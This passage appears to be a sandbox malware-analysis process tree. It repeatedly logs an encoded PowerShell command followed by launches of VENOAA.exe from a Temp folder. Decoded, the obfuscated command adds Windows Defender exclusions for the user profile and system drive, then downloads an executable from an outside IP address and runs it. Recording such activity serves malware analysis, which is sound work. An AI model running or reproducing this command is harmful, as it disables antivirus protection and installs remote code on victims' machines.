        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        290⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        291⤵
        
        PID:3648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        292⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        293⤵
        
        PID:3032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        294⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        295⤵
        
        PID:4112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        296⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        297⤵
        
        PID:2796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        298⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        299⤵
        
        PID:376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        300⤵
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        301⤵
        
        PID:1348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        302⤵
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        303⤵
        
        PID:2832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        304⤵
        
        PID:3848
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        305⤵
        
        PID:1032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        306⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        307⤵
        
        PID:4100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        308⤵
        
        PID:508
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        309⤵
        
        PID:2004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        310⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        311⤵
        
        PID:2296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        312⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        313⤵
        
        PID:3680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        314⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        315⤵
        
        PID:1684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
